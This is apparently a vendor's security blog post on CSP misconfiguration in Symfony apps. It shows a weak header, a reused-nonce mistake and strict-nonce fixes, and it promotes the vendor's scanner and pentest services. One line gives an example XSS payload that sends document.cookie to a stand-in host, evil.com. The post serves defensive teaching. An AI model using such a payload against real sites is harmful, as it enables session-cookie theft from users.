🚨 CSP Bypass in Symfony: How It Happens and How to Prevent It
Content Security Policy (CSP) is a powerful web security standard to prevent XSS and data injection. But developers often misconfigure CSP headers in Symfony apps, making them prone to bypasses.
In this post, we’ll explain how a CSP bypass works in Symfony, show realistic coding examples, and share mitigation tips. We’ll also use our Website Vulnerability Scanner online to test CSP misconfigurations.
If you’re building or auditing Symfony apps, this guide is for you!
🧐 What is a CSP Bypass?
CSP defines which resources the browser is allowed to load. But attackers can exploit overly broad policies, missing directives, or misconfigured nonces to inject malicious scripts.
Example bypass scenarios in Symfony include:
- Using
unsafe-inlineorunsafe-evalin the policy. - Whitelisting
*.example.comwhich can be taken over via a subdomain takeover. - Misusing
nonceattributes by reusing them across sessions.
🧪 Example: Misconfigured CSP in Symfony
Here’s a typical Symfony controller setting a weak CSP header:
// src/Controller/SecurityController.php
$response = new Response($content);
$response->headers->set('Content-Security-Policy', "default-src *; script-src 'unsafe-inline'");
return $response;
Why is this bad?
-
default-src *allows loading from any origin. -
unsafe-inlineallows inline scripts — defeating CSP’s purpose.
Attackers can inject scripts via XSS, as CSP isn’t blocking inline code.
💣 CSP Bypass Exploit in Symfony
If the above code is deployed, an attacker might craft a payload like this:
<script>fetch('https://evil.com/steal?cookie=' + document.cookie)</script>
Since unsafe-inline is allowed, the browser executes it.
Even if you use nonces, a common mistake is to reuse the nonce value per session:
$nonce = $_SESSION['nonce']; // ❌ bad: static across requests
So an attacker can observe and reuse it.
📸 Free Tool Preview
Below is a screenshot of our Website Vulnerability Scanner tool that you can use to scan your Symfony site for CSP and other vulnerabilities:
Screenshot of the free tools webpage where you can access security assessment tools.
You can generate a free vulnerability report after testing. Here’s an example of such a report to check Website Vulnerability:
An Example of a vulnerability assessment report generated with our free tool, providing insights into possible vulnerabilities.
🛡️ How to Fix CSP in Symfony
✅ Use strict CSP headers:
$nonce = base64_encode(random_bytes(16));
$response = new Response($content);
$response->headers->set(
'Content-Security-Policy',
"default-src 'self'; script-src 'nonce-$nonce'"
);
✅ Make sure the nonce is unique per request:
$nonce = base64_encode(random_bytes(16));
$_SESSION['nonce'] = $nonce; // rotate per request
✅ Avoid wildcards (*) and avoid unsafe-inline.
✅ Use Free Website Security Scanner to detect CSP misconfigurations.
🔗 Learn More on Our Blog
We regularly post about web app security on our Pentest Testing Blog.
Check out related posts:
📈 Relevant Services We Offer
🔍 Web App Penetration Testing
If you want experts to test your Symfony app’s security (including CSP), check out our full Web App Penetration Testing Service.
🤝 Offer Cybersecurity to Your Clients
If you’re a developer, agency, or MSP, partner with us to Offer Cybersecurity Services to Your Clients.
📬 Stay Updated!
We publish actionable security tips, case studies, and tool updates every week.
👉 Subscribe on LinkedIn
📄 Conclusion
CSP is critical — but misconfigurations in Symfony can undermine its effectiveness. Test your app with strict policies, rotate nonces properly, and always scan your site for Website Security test using our free tool.
If you found this helpful, don’t forget to follow us and subscribe to our newsletter!
Top comments (0)